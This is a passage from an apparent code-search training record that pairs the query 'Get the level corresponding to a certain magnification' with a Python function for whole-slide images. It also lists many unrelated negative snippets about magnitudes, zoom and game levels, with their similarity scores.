level):\n return 2 ** (level - 1)", "def magnitude(x):\n return x.magnitude if hasattr(x, 'magnitude') else x", "def mag2(self) -> numbers.Number:\n mv_val = self.layout.gmt_func(self.layout.adjoint_func(self.value), self.value)\n return mv_val[0]", "def read_slide_at_mag(slide, mag):\n exact_level = get_level_for_mag(slide, mag)\n if exact_level is not None:\n return slide.read_region((0,0), exact_level, get_level_size(slide, exact_level))\n else:\n max_size = slide.dimensions\n region_size = tuple(get_size_for_mag(slide, mag))\n downsample = np.average([max_dim/region_dim for max_dim, region_dim in zip(max_size, region_size)])\n best_level = slide.get_best_level_for_downsample(downsample)\n best_level_size = get_level_size(slide, best_level)\n best_level_img = slide.read_region((0,0), best_level, best_level_size)\n return best_level_img.resize(region_size, resample = Image.BICUBIC)", "def difficulty(mag):\n mag = float(mag)\n if mag <= -4:\n return \"Visible in daytime.\"\n elif mag <= 6:\n return \"Visible at night.\"\n else:\n flux = mag_def(\"%s x\" % mag)\n needed_flux = mag_def(\"6 x\")\n eye_area = math.pi * (0.005**2)\n needed_power = needed_flux * eye_area\n diameter = 2 * math.sqrt(needed_power / (flux*math.pi))\n return \"%s m telescope needed.\" % diameter", "def _get_med(self):\n return self.__med", "def enemyrawdmg(self):\n\n enemystr = globalvalues.ai.getstatus()[3]\n # rngfactor will ensure that regular mobs won't absolutely crush you\n rngfactor = float(float(random.randint(45, 65)) / 100)\n level = (\n globalvalues.p1.getlevel()\n - globalvalues.ai.getstatus()[0]\n )\n lvlfactor = float(1 - level * 0.05)\n\n return int((enemystr) * 102 * 0.12 * rngfactor * lvlfactor)", "async def get_xp(level, command):\n if command == \"profile\":\n return 250 * level\n return int((2 * 350) * (2 ** (level - 2))) # 350 is base value (level 1)", "def get_map_size(level):\n if level < 5:\n return 5, 5\n if level < 70:\n return 10, 10\n if level < 150:\n return 25, 25\n return 50, 50", "def normalize_zoomlvl(lvl):\n if lvl < gMinZoomLevel:\n return gMinZoomLevel\n elif lvl > gMaxZoomLevel:\n return gMaxZoomLevel\n else:\n return lvl - gMinZoomLevel", "def magnitude(pos):\n x, y = pos\n return x * x + y * y", "def rscale(mag=10.0):\n if mag > 11.5:\n return 0.5\n elif mag > 11.0:\n return 1.0\n elif mag > 10.5:\n return 1.5\n elif mag > 10.0:\n return 1.5\n elif mag > 9.5:\n return 2.0\n elif mag > 9.0:\n return 2.5\n elif mag > 8.5:\n return 3.0\n else:\n return 3.5", "def mab0(self):\n return GALEX_INFO[self.bandname][\"ABmag0\"]", "def getMagnification(self, pixelSize=0.0129, isFilter=False, erodeIter=None):\r\n\r\n if not hasattr(self, 'determinantMap'):\r\n _ = self._getDeterminantMap()\r\n\r\n if hasattr(self, 'finalPathesMarked'):\r\n finalPatches = self.finalPatchesMarked\r\n elif hasattr(self, 'finalPatches'):\r\n finalPatches = self.finalPatches\r\n else:\r\n self.processTrial()\r\n finalPatches = self.finalPatches\r\n\r\n magMap = 1 / self.determinantMap\r\n\r\n if isFilter:\r\n magMap = ni.filters.gaussian_filter(magMap, self.params['signMapFilterSigma'])\r\n\r\n # get mean power amplitude for all visual areas normalized by V1\r\n magDict = {}\r\n for key, patch in finalPatches.items():\r\n array = patch.array.astype(np.float)\r\n\r\n if erodeIter:\r\n array = ni.binary_erosion(array, iterations=erodeIter)\r\n\r\n area = np.sum(array)\r\n\r\n totalMag = np.sum(array * magMap)\r\n\r\n magDict.update({key: (pixelSize ** 2) * totalMag / area})\r\n\r\n return magDict", "def get_size_for_mag(slide, mag):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = max_mag/mag\n return [np.int(np.round(dim/downsample)) for dim in max_size]", "def _get_depth_map_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Depth/0.125/\"\n else:\n return \"Depth/0.25/\"\n else: \n return \"Depth/\"", "def mag(self) -> float:\n return sqrt(self.sqr_mag())", "def flux2Mag(flux, zeropoint=27.0):\n return -2.5 * np.log10(flux) + zeropoint", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def getMagFlux(self):\n return self.magflux", "def mi_to_m(radius):\n return int(float(radius) * 1609.34)", "def __get_maidenhead(self, level):\n \n mh_resp = {'grid': None, 'lock': False}\n loc = self.__get_gps_location()\n\n if loc['lock']:\n mh_resp['lock'] = True\n mh_resp['grid'] = mh.to_maiden(loc['lat'], loc['lon'], precision=level)\n\n return mh_resp", "def magnification(w0, lambda0, s, f, M2=1):\n zR2 = z_rayleigh(w0, lambda0, M2)**2\n return f/np.sqrt((s+f)**2+zR2)", "def get_min_mag_center(self):\r\n\t\treturn self.min_mag + self.bin_width / 2", "def get_prior_mag(mag_dict):\n print(\"GETTING MAGNITUDE\")\n print(mag_dict)\n print(type(mag_dict))\n mag = 17\n if not isinstance(mag_dict, dict):\n print(\"Not a dictionary so using mag=17\")\n return mag\n\n for k, v in mag_dict.items():\n mag = v['mag']\n\n try:\n mag = float(mag)\n except Exception as e:\n print(str(e), \"Error getting magnitude\")\n mag = 17\n print(mag)\n return mag", "def medoidMosaic(self,collection):\n \n\t\t# calculate the median of temp band\n\t\tthermal = ee.ImageCollection(collection.select(['thermal'])).median()\n \n\t\tcollection = collection.select(self.env.divideBands)\n\n\t\tbandNames = self.env.divideBands;\n\t\tbandNumbers = ee.List.sequence(1,bandNames.length());\n \n\t\t# calculate medion\n\t\tmedian = ee.ImageCollection(collection).median()\n \n\t\tdef subtractmedian(img):\n\t\t\tdiff = ee.Image(img).subtract(median).pow(ee.Image.constant(2));\n\t\t\treturn diff.reduce('sum').addBands(img);\n \n\t\tmedoid = collection.map(subtractmedian)\n \n\t\tmedoid = ee.ImageCollection(medoid).reduce(ee.Reducer.min(bandNames.length().add(1))).select(bandNumbers,bandNames);\n \n\t\treturn medoid.addBands(thermal);", "def get_magmom_string():\n\n magmoms = []\n poscar_lines = open('POSCAR').readlines()\n elements = poscar_lines[5].split()\n amounts = poscar_lines[6].split()\n for i in range(len(elements)):\n if Element(elements[i]).is_transition_metal:\n magmoms.append('{}*6.0'.format(amounts[i]))\n else:\n magmoms.append('{}*0.5'.format(amounts[i]))\n return ' '.join(magmoms)", "def get_multiplier(quality):\n\n if quality == \"low\":\n return 5\n elif quality == \"medium\":\n return 6\n elif quality == \"good\":\n return 7\n elif quality == \"high\":\n return 8\n return 6", "def displacement_mag(self):\n print(3284 * math.pow(self.concentration, -0.158))\n\n return 3284 * math.pow(self.concentration, -0.158)", "def _get_normal_map_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Normals/0.125/\"\n else:\n return \"Normals/0.25/\"\n else: \n return \"Normals/\"", "def build_mipmaps(self, base: int = 0, max_level: int = 1000) -> None:\n if self._samples > 0:\n raise ValueError(\"Multisampled textures don't support mimpmaps\")\n\n gl.glActiveTexture(gl.GL_TEXTURE0 + self._ctx.default_texture_unit)\n gl.glBindTexture(gl.GL_TEXTURE_2D, self._glo)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_BASE_LEVEL, base)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAX_LEVEL, max_level)\n gl.glGenerateMipmap(gl.GL_TEXTURE_2D)", "def getMeasure(unique_name):", "def getMeasure(unique_name):", "def Mass_in_R(self, r):\n return self.int_over_density(r)", "def mag(self):\n return math.sqrt(sum([coefficient ** 2\n for coefficient in self.values]))", "def mag(field):\n return np.sqrt(np.sum(field**2, axis=0, keepdims=True))", "def magn(names, values, data, model_key, plot_key=False):\n # Making sure number of parameters matches number of names given:\n assert len(names) == len(values), \"len(names) != len(values) in datasim.magn\"\n\n zpicks = data['zpicks']\n # Corrected absolute magnitude M of SN.\n M = values[0]\n\n# dlpc, da, integrated_zpicks, integrated_dlpc, plot_var = zodesolve.zodesolve(names, values, zpicks, model_key, plot_key)\n\n dlpc, da, plot_var = zodesolve.zodesolve(names, values, zpicks, model_key, plot_key)\n\n # Calculating apparent magnitudes of supernovae at the simulated\n # luminosity distances using the distance modulus formula.\n mag = 5 * np.log10(dlpc/10) + M\n# integrated_mag = 5 * np.log10(integrated_dlpc/10) + M\n# print('redshift =',zpicks[-1],'da =', da[-1])\n\n# # plotting interpoated data vs input and full\n# import matplotlib.pyplot as plt\n# import matplotlib as mpl\n# #mpl.style.use('default') # has to be switched on to set figure size\n# mpl.style.use('fivethirtyeight')\n# plt.rcParams['axes.facecolor'] = 'white'\n# plt.rcParams['figure.facecolor'] = 'white'\n# plt.rcParams['grid.color'] = 'white'\n#\n# print('integrated_zpicks',integrated_zpicks[0])\n# print('zpicks', zpicks[0])\n#\n# plt.figure()\n# plt.scatter(integrated_zpicks, integrated_mag, s=70, label='integrated', c=\"C{}\".format(0))\n# plt.plot(zpicks, mag, label='interpolated', linestyle='-', c=\"C{}\".format(1))\n# plt.legend()\n\n if plot_key:\n # Plotting evolution of parameters in the model.\n import plots\n plots.modelcheck(mag, zpicks, plot_var, model_key)\n\n return mag, da", "def getM(self):\r\n return self.M", "def _magsamples(self):\n if self._derived_properties[\"magsamples\"] is None:\n if self.lbda is None:\n raise AttributeError(\"lbda not set.\")\n self.derive_magsamples()\n \n return self._derived_properties[\"magsamples\"]", "def getModifiers(self, img_info):\n modifiers = \"\"\n width_percent_reduction = 0\n height_percent_reduction = 0\n max_width = float(self.cfg().chatimg.max_width)\n max_height = float(self.cfg().chatimg.max_height)\n if max_width and img_info.width > max_width:\n width_percent_reduction = (img_info.width / max_width) - 1.0\n if max_height and img_info > max_height:\n height_percent_reduction = (img_info.height / max_height) - 1.0\n\n if width_percent_reduction > 0 and width_percent_reduction > height_percent_reduction:\n modifiers = \" width=\\\"%s\\\" \" % max_width\n elif height_percent_reduction > 0:\n modifiers = \" height=\\\"%d\\\" \" % max_height\n\n return modifiers", "def tile_gen_at_mag(wsi, mag, tile_size):\n #Get size of WSI at Level 0 (Max Magnification)\n x0, y0 = wsi.level_dimensions[0]\n #Get size of WSI at the mag we want\n x_mag, y_mag = get_size_for_mag(wsi, mag)\n x_tiles = int(np.floor(x_mag/tile_size))\n y_tiles = int(np.floor(y_mag/tile_size))\n #Scale tile size accordingly\n scale = highest_mag(wsi)/mag\n yield (x_tiles, y_tiles)\n tiles = []\n for y in range(y_tiles):\n for x in range(x_tiles):\n x_coord = round(x*scale*tile_size)\n y_coord = round(y*scale*tile_size)\n scaled_tile_size = round(scale*tile_size)\n tile = wsi.read_region((x_coord, y_coord), 0, (scaled_tile_size, scaled_tile_size))\n yield tile.resize((tile_size, tile_size), resample = Image.BICUBIC)", "def get_median_area(self, mag, rake):\n return 1e-4", "def estimate_phones(x):\n if x['mean_luminosity_km2'] > 5:\n return 10\n elif x['mean_luminosity_km2'] > 1:\n return 5\n else:\n return 1", "def M(self):\n return self._properties['M']", "def getMagnificationsFromTiltSeries(self, TiltSeries_):\n # initialize alignment in seperate array - easier for optimization\n self._alignmentMagnifications = len(TiltSeries_._ProjectionList._list) * [1.]\n for (kk, proj) in enumerate(TiltSeries_._ProjectionList._list):\n self._alignmentMagnifications[kk] = proj.getAlignmentMagnification()\n return self._alignmentMagnifications", "def mag(q):\n magnitude = np.sqrt((q[0,0]**2)+(q[0,1]**2)+(q[0,2]**2)+(q[0,3]**2))\n return magnitude", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def getLevel(self, level):\n mingroup = None\n groups = self.console.storage.getGroups()\n\n for x in groups:\n\n if x.level < level:\n continue\n\n if mingroup is None:\n mingroup = x\n continue\n\n if x.level < mingroup.level:\n mingroup = x\n\n return mingroup.name", "def sazelmag(source):\n if 1:\n # bizarre failures in s.azel() showing up on Mar 11, 2006....\n try:\n Azel = subarrayControl.s.azel(source, 0.0);\n except Exception, e:\n print \"Problem with s.azel(%s): %s\" %(source,e)\n return (source, 0, -10, 0)\n try:\n mag = subarrayControl.s.queryMag(source)\n except Exception, e:\n print \"Problem with queryMag(%s): %s\" %(source,e) \n return (source, 0, -10, 0)\n return ( source, Azel[0], Azel[1], mag)\n else:\n cmd = 'checksource source=%s comments=t sexa=f' % source\n # the 2nd (last) line contains all the info\n r=os.popen(cmd).readlines()[1].strip()\n rs=r.split()\n re=r.split('=')\n if len(re) == 2:\n mag=float(re[1])\n else:\n mag=-9.99\n return ( source, float(rs[3]), float(rs[4]), mag)", "def calcMag(self):\n M = np.sum(self.config)\n return M", "def get_modifier(path, lfdb):\n (cam, lens) = get_cam_lens(path, lfdb)\n (width, height) = map(int, get_exif(path, 'ImageSize').split('x'))\n return lensfunpy.Modifier(lens, cam.crop_factor, width, height)", "def mag_err(self):\n return self.photosamplers.get_estimate(mag=True)[1:]", "def magabs(self):\n if not self.has_target():\n raise AttributeError(\"No target defined, I can't get the distance\")\n return self.mag - 5*( np.log10(self.target.distmpc*1.e6) - 1)", "def compute_obj_mag(obj_flux, candle_flux, candle_mag):\n instrument_mag = -2.5 * np.log10(candle_flux)\n offset = instrument_mag - candle_mag\n return -2.5 * np.log10(obj_flux) - offset", "def getMagnitudes(self):\n return self._bmag, self._vmag, self._jmag, self._hmag, self._kmag", "def _level_info(entity):\n if entity.is_max_level():\n return 'Maxed'\n if entity.max_level is not None:\n return '{entity.level}/{entity.max_level}'.format(entity=entity)\n return entity.level", "def calc_mag(self):\n mag = np.sum(self.box)\n return mag", "def max_stat(self, stat: Stat, level: Optional[int]=None):\n if level is None:\n level = self.level\n\n if stat.name.upper() == \"HP\":\n value = (self.individual_values[stat] + self.species.base_stats[stat] + math.sqrt(self.effort_values[stat]) / 8 + 50) * level / 50 + 10\n else:\n value = (self.individual_values[stat] + self.species.base_stats[stat] + math.sqrt(self.effort_values[stat]) / 8) * level / 50 + 5\n\n return int(value)", "def get_mlt_phys(sed_name):\n\n new_name = sed_name.replace('+','-').replace('a','-').split('-')\n\n logg_sgn_dex = len(new_name[0])\n\n if sed_name[logg_sgn_dex] == '-':\n logg_sgn = 1.0\n elif sed_name[logg_sgn_dex] == '+':\n logg_sgn = -1.0\n else:\n raise RuntimeError('Cannot get logg_sgn for %s' % sed_name)\n\n metallicity_sgn_dex = len(new_name[0]) + len(new_name[1]) + 1\n\n if sed_name[metallicity_sgn_dex] == '-':\n metallicity_sgn = -1.0\n elif sed_name[metallicity_sgn_dex] == '+':\n metallicity_sgn = 1.0\n else:\n raise RuntimeError('Cannot get metallicity_sgn for %s' % sed_name)\n\n teff = 100.0*float(new_name[0][3:])\n metallicity = metallicity_sgn*float(new_name[2])\n logg = logg_sgn*float(new_name[1])\n\n return teff, metallicity, logg", "def extract_level_from_name(self):\n images = glob.glob(os.path.join(self.frame_dir, '*'))\n level = []\n for i, im in enumerate(images):\n base, tail = os.path.split(im)\n name = tail.split('.')[-2]\n number = name.split('_')[-1]\n level.append(float(number))\n return np.array(level)", "def galaxy(img):\n return img[420:490, 710:770]", "def zoom(self):\n return self['zoom']", "def add_Mag_Value(self, input):\n self.magflux = input", "def get_M(self):\n return 1.0", "def getLevel(unique_name):", "def mab0(self):\n return WISE_INFO[self.bandname][\"ABmag0\"]", "def test_changeIlluminationLevel(self):\n fade_to_black = \"Your environs fade to black due to Ineffable Spooky Magic.\"\n no_change = \"You do it. Swell.\"\n dark_to_light = \"Your environs are suddenly alight.\"\n brighten = \"Your environs seem slightly brighter.\"\n endarken = \"Your environs seem slightly dimmer.\"\n Manipulator.createFor(self.playerWrapper.actor)\n\n self._test(\n \"illuminate 0\",\n [fade_to_black],\n [fade_to_black])\n\n ll = self.store.findUnique(\n objects.LocationLighting,\n objects.LocationLighting.thing == self.location)\n self.assertEquals(ll.candelas, 0)\n\n self._test(\n \"illuminate 0\",\n [no_change])\n self.assertEquals(ll.candelas, 0)\n\n self._test(\n \"illuminate 100\",\n [dark_to_light],\n [dark_to_light])\n self.assertEquals(ll.candelas, 100)\n\n self._test(\n \"illuminate 110\",\n [brighten],\n [brighten])\n self.assertEquals(ll.candelas, 110)\n\n self._test(\n \"illuminate 100\",\n [endarken],\n [endarken])\n self.assertEquals(ll.candelas, 100)\n\n self._test(\n \"illuminate 0\",\n [fade_to_black],\n [fade_to_black])\n self.assertEquals(ll.candelas, 0)", "def get_info(self, level):\n\n # see if we can open the tile info file.\n info_file = os.path.join(self.tile_dir, '%02d' % level,\n self.TileInfoFilename)\n try:\n fd = open(info_file, 'rb')\n except IOError:\n return None\n\n # OK, looks like we actually do have this level!\n info = pickle.load(fd)\n fd.close()\n\n return info", "def take_mag(x, dim=1):\n power = torch.stack(torch.chunk(x, 2, dim=dim), dim=-1).pow(2).sum(dim=-1)\n power = power + EPS\n return power.pow(0.5)", "def GetScale(self):\n ...", "def getMagBoundary(self):\n\n # Get the boundary of magnitude based on the filter\n lowMagnitude = nan\n highMagnitude = nan\n if (self.filter == self.FilterU):\n lowMagnitude = 7.94\n highMagnitude = 14.80\n\n elif (self.filter == self.FilterG):\n lowMagnitude = 9.74\n highMagnitude = 16.17\n\n elif (self.filter == self.FilterR):\n lowMagnitude = 9.56\n highMagnitude = 15.73\n\n elif (self.filter == self.FilterI):\n lowMagnitude = 9.22\n highMagnitude = 15.26\n\n elif (self.filter == self.FilterZ):\n lowMagnitude = 8.83\n highMagnitude = 14.68\n \n elif (self.filter == self.FilterY):\n lowMagnitude = 8.02\n highMagnitude = 13.76\n\n return lowMagnitude, highMagnitude", "def AB_zero_mag(self):\n if self.wavelength_unit is None:\n raise AttributeError('Needs wavelength units')\n\n C1 = (Unit(self.wavelength_unit).to('AA') ** 2 /\n Constants.c.to('AA/s').value)\n c1 = self._lpivot ** 2 * C1\n\n m = 2.5 * np.log10(_drop_units(c1)) + 48.6\n return m", "def magnitude_vect(vect):\n mag = (vect[0] ** 2 + vect[1] ** 2 + vect[2] ** 2) ** .5\n return mag", "def get_min_mag_edge(self):\r\n\t\treturn self.min_mag", "def setMagnificationsInTiltSeries(self, TiltSeries_):\n kk = 0\n for proj in TiltSeries_._ProjectionList._list:\n proj.setAlignmentMagnification(self._alignmentMagnifications[kk])\n kk = kk + 1", "def get_scale():\r\n\r\n \r\n return 0.5", "def set_mag(self, target_mag):\n raise NotImplementedError", "def QuatMag(wxyz):\n return np.sqrt(np.sum(np.square(wxyz)))", "def get_estimate(self, mag=False):\n if mag is False:\n return super(PhotoSamplers,self).get_estimate()\n \n return self._magsamples.get_estimate()", "def zoom(self):\n res = np.max(self.metadata[\"resolution\"])\n\n if self.atlas_name == \"allen_human_500um\":\n logger.debug(\n \"ATLAS: setting zoom manually for human atlas, atlas needs fixing\"\n )\n return 350\n else:\n return 40 / res", "def d50Illum(wavelength):\n return _d50Illum.calc(wavelength)", "def maxResolution(self,wave = None):\n\n d = 2000.0*self.height*math.tan(self.angle/2) # Max pathlength in microns.\n dn = self.n.getDerivative(wave) # dn/dy of materail\n return d*dn #", "def get_level(self, level):\n return", "def calculateRatio(levelDims):\n highestReso = np.asarray(levelDims[0])\n lowestReso = np.asarray(levelDims[-1])\n Xratio, Yratio = highestReso/lowestReso\n return (Xratio, Yratio)", "def clamped(self, magnitude):\n return self.unit * magnitude", "def Damage_Weapon_Mod(self, w_multiplier, damage_type=\"\"):\n damage_type = str(damage_type);\n if damage_type == \"\":\n return \"\".join((\"[[\", self.W(w_multiplier), \"+\", self.Attribute_Power(\"damage\"), \"]] damage.\"));\n else:\n return \"\".join((\"[[\", self.W(w_multiplier), \"+\", self.Attribute_Power(\"damage\"), \"]] \", damage_type, \" damage.\"));", "def set_level(self, x, level):\n return x * 10 ** ((level - self.ref_level) / 20)" ]
[ "0.67559737", "0.6685309", "0.66784066", "0.65893006", "0.6497956", "0.62938315", "0.61198086", "0.6092812", "0.6024545", "0.5632027", "0.55412483", "0.5471536", "0.54661393", "0.5413815", "0.5413614", "0.53920174", "0.53455603", "0.5330778", "0.5330044", "0.5313709", "0.5275029", "0.52631474", "0.5228527", "0.5221894", "0.51973796", "0.5189064", "0.5183032", "0.51619035", "0.516099", "0.5150507", "0.51376766", "0.5134299", "0.51243895", "0.51142454", "0.5104735", "0.50758916", "0.50611293", "0.5057524", "0.5051156", "0.5048918", "0.5047178", "0.50306964", "0.50156546", "0.50002736", "0.49981356", "0.49981356", "0.49930725", "0.4987721", "0.4985973", "0.49804938", "0.49619427", "0.4947022", "0.49444", "0.49423897", "0.4938305", "0.4928025", "0.49217445", "0.49143326", "0.49119207", "0.4911245", "0.4906974", "0.4904951", "0.489991", "0.48896322", "0.48826405", "0.48799917", "0.48765293", "0.48667347", "0.48627496", "0.4848207", "0.48479176", "0.48465753", "0.4845178", "0.4839021", "0.48304582", "0.4819045", "0.4814439", "0.48122925", "0.48078236", "0.479065", "0.4777834", "0.47756505", "0.47691354", "0.47649318", "0.47612372", "0.4751469", "0.47512352", "0.47492564", "0.47477126", "0.47463083", "0.47404742", "0.47398472", "0.47360802", "0.4730037", "0.47252855", "0.47232857", "0.47141248", "0.4707393", "0.46992302", "0.46986446" ]
0.7867714
0
Get the level corresponding to a certain magnification, if available
def get_level_for_mag(slide, mag): level_mags_rounded = list(np.round(level_mags(slide), decimals = 2)) if mag in level_mags_rounded: return level_mags_rounded.index(mag) else: return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_level_mag(slide, level):\n return level_mags(slide)[level]", "def getLevel(unique_name):", "def level_mags(slide):\n return [highest_mag(slide)/downsample for downsample in slide.level_downsamples]", "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def get_luminosity(name):\n all_data = mc.get('sensor_values')\n name = _lookup(name)\n try:\n return all_data[name][3]\n except KeyError:\n raise KeyError(\"No sensor with that name\")", "def getNativeMagnification(self):\n pixelInfo = self._tiffDirectories[-1].pixelInfo\n mm_x = pixelInfo.get('mm_x')\n mm_y = pixelInfo.get('mm_y')\n # Estimate the magnification if we don't have a direct value\n mag = pixelInfo.get('magnification') or 0.01 / mm_x if mm_x else None\n return {\n 'magnification': mag,\n 'mm_x': mm_x,\n 'mm_y': mm_y,\n }", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def get_level(rol):\n\treturn rol.level", "def getLevel(self, level):\n mingroup = None\n groups = self.console.storage.getGroups()\n\n for x in groups:\n\n if x.level < level:\n continue\n\n if mingroup is None:\n mingroup = x\n continue\n\n if x.level < mingroup.level:\n mingroup = x\n\n return mingroup.name", "def highest_mag(slide):\n return int(slide.properties['aperio.AppMag'])", "def get_luminosity(self):\n\n if self.no_dist is False and self.no_flux is False:\n\n dist = self.distance\n snu = self.snu_at_1GHz\n lum = lumin(dist, snu)\n\n self.lum = lum\n else:\n self.lum = -1 # use -1 to indicate unknown luminosity\n return self.lum", "def resolution(self, level):\n return 2 ** (level - 1)", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def _level_info(entity):\n if entity.is_max_level():\n return 'Maxed'\n if entity.max_level is not None:\n return '{entity.level}/{entity.max_level}'.format(entity=entity)\n return entity.level", "def getLevel(self):\n return self.level", "def extract_level_from_name(self):\n images = glob.glob(os.path.join(self.frame_dir, '*'))\n level = []\n for i, im in enumerate(images):\n base, tail = os.path.split(im)\n name = tail.split('.')[-2]\n number = name.split('_')[-1]\n level.append(float(number))\n return np.array(level)", "def get_prior_mag(mag_dict):\n print(\"GETTING MAGNITUDE\")\n print(mag_dict)\n print(type(mag_dict))\n mag = 17\n if not isinstance(mag_dict, dict):\n print(\"Not a dictionary so using mag=17\")\n return mag\n\n for k, v in mag_dict.items():\n mag = v['mag']\n\n try:\n mag = float(mag)\n except Exception as e:\n print(str(e), \"Error getting magnitude\")\n mag = 17\n print(mag)\n return mag", "def getLevels():", "def get_level_size(slide, level):\n return slide.level_dimensions[level]", "def get_level(self, level):\n return", "def read_slide_at_mag(slide, mag):\n exact_level = get_level_for_mag(slide, mag)\n if exact_level is not None:\n return slide.read_region((0,0), exact_level, get_level_size(slide, exact_level))\n else:\n max_size = slide.dimensions\n region_size = tuple(get_size_for_mag(slide, mag))\n downsample = np.average([max_dim/region_dim for max_dim, region_dim in zip(max_size, region_size)])\n best_level = slide.get_best_level_for_downsample(downsample)\n best_level_size = get_level_size(slide, best_level)\n best_level_img = slide.read_region((0,0), best_level, best_level_size)\n return best_level_img.resize(region_size, resample = Image.BICUBIC)", "def get_mag(self):\n raise NotImplementedError", "def _calculate_magnification(self, times):\n if self._model.n_lenses == 2:\n factor = 10.\n params = self._model.parameters\n t_1 = params.t_0 - factor * params.t_E\n t_2 = params.t_0 + factor * params.t_E\n self._model.set_magnification_methods([t_1, 'VBBL', t_2])\n self._model.set_default_magnification_method(\n 'point_source_point_lens')\n\n magnification = self._model.magnification(times)\n return magnification", "def get_level(level_name):\n return LEVELS[level_name.upper()]", "def test_changeIlluminationLevel(self):\n fade_to_black = \"Your environs fade to black due to Ineffable Spooky Magic.\"\n no_change = \"You do it. Swell.\"\n dark_to_light = \"Your environs are suddenly alight.\"\n brighten = \"Your environs seem slightly brighter.\"\n endarken = \"Your environs seem slightly dimmer.\"\n Manipulator.createFor(self.playerWrapper.actor)\n\n self._test(\n \"illuminate 0\",\n [fade_to_black],\n [fade_to_black])\n\n ll = self.store.findUnique(\n objects.LocationLighting,\n objects.LocationLighting.thing == self.location)\n self.assertEquals(ll.candelas, 0)\n\n self._test(\n \"illuminate 0\",\n [no_change])\n self.assertEquals(ll.candelas, 0)\n\n self._test(\n \"illuminate 100\",\n [dark_to_light],\n [dark_to_light])\n self.assertEquals(ll.candelas, 100)\n\n self._test(\n \"illuminate 110\",\n [brighten],\n [brighten])\n self.assertEquals(ll.candelas, 110)\n\n self._test(\n \"illuminate 100\",\n [endarken],\n [endarken])\n self.assertEquals(ll.candelas, 100)\n\n self._test(\n \"illuminate 0\",\n [fade_to_black],\n [fade_to_black])\n self.assertEquals(ll.candelas, 0)", "def get_multiplier(quality):\n\n if quality == \"low\":\n return 5\n elif quality == \"medium\":\n return 6\n elif quality == \"good\":\n return 7\n elif quality == \"high\":\n return 8\n return 6", "def difficulty(mag):\n mag = float(mag)\n if mag <= -4:\n return \"Visible in daytime.\"\n elif mag <= 6:\n return \"Visible at night.\"\n else:\n flux = mag_def(\"%s x\" % mag)\n needed_flux = mag_def(\"6 x\")\n eye_area = math.pi * (0.005**2)\n needed_power = needed_flux * eye_area\n diameter = 2 * math.sqrt(needed_power / (flux*math.pi))\n return \"%s m telescope needed.\" % diameter", "def getNativeMagnification(self):\n return self._nativeMagnification.copy()", "def get_levels(self):\n return self.levels[self.game]", "def track_moisture_level():\n try:\n normal_level_init = 470\n low_level_init = 560\n\n global LIMIT_FLAG\n sensor_read = sensorData.read_moisture()\n generate_json.define_structure(\"moisture\", sensor_read)\n\n if sensor_read > low_level_init:\n if LIMIT_FLAG != 3:\n # When it is dry (Moisture Level Low)\n LIMIT_FLAG = 3\n blynk.notify('Moisture Level Low! Irrigation Needed')\n blynk.email('brunocpp@gmail.com', 'Alert: Moisture Level Low',\n 'Moisture Level Low! Irrigation Needed')\n logging_write()\n elif normal_level_init <= sensor_read <= low_level_init:\n if LIMIT_FLAG != 2:\n LIMIT_FLAG = 2\n logging_write()\n else:\n if LIMIT_FLAG != 1:\n LIMIT_FLAG = 1\n logging_write()\n return sensor_read\n\n except Exception as e:\n logging_write(e)", "def get_map_size(level):\n if level < 5:\n return 5, 5\n if level < 70:\n return 10, 10\n if level < 150:\n return 25, 25\n return 50, 50", "async def get_xp(level, command):\n if command == \"profile\":\n return 250 * level\n return int((2 * 350) * (2 ** (level - 2))) # 350 is base value (level 1)", "def _calc_refinement_level(coords, well_loc, radius_per_level, max_level):\n if len(coords) != len(well_loc):\n raise ValueError('Unmatching dimensions for cell or well coordinates.')\n\n diff = (np.abs(np.array(coords) - np.array(well_loc))) // radius_per_level\n return max_level - np.max(diff)", "def _magsamples(self):\n if self._derived_properties[\"magsamples\"] is None:\n if self.lbda is None:\n raise AttributeError(\"lbda not set.\")\n self.derive_magsamples()\n \n return self._derived_properties[\"magsamples\"]", "def get_food_level(self):\n return self.plant", "def find_level(self, prefix):\n if re.match(self.raw, prefix):\n return 'rawLevel', self.find_sample(self.raw, prefix)\n elif re.match(self.run, prefix):\n return 'runLevel', self.find_sample(self.run, prefix)\n elif re.match(self.sample, prefix):\n return 'sampleLevel', self.find_sample(self.sample, prefix)\n elif re.match(self.agg, prefix):\n return 'aggLevel', self.find_sample(self.agg, prefix)\n else:\n raise ValueError(\"Can't find a match for %s\" % prefix)", "def estimate_phones(x):\n if x['mean_luminosity_km2'] > 5:\n return 10\n elif x['mean_luminosity_km2'] > 1:\n return 5\n else:\n return 1", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def get_vol_lvl(self):\n global volume\n #output = subprocess.check_output(['amixer', 'sget', self.mixer_name]).decode('utf-8')\n return volume#int(output[(output.find('[') + 1):output.find('%]', (output.find('[') + 1))])", "def detail(self):\n return self.uniform(\"detail\",\n self.img_scale * .05,\n self.img_scale * .2)", "def _determine_level(levels, points):\n import operator\n level = None\n sorted_levels = sorted(levels.iteritems(), key=operator.itemgetter(1))\n for el in sorted_levels:\n if points <= el[1]:\n level = el[0]\n break\n\n max_level = max(levels.iterkeys(), key=lambda threshold: levels[threshold])\n if points >= levels[max_level]:\n level = max_level\n return level", "def magnitude(x):\n return x.magnitude if hasattr(x, 'magnitude') else x", "def _get_depth_map_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Depth/0.125/\"\n else:\n return \"Depth/0.25/\"\n else: \n return \"Depth/\"", "def flux_hack(self):\r\n return self.planes[1].galaxies[0].light_profiles[0].flux", "def difficulty_for_level(level):\n 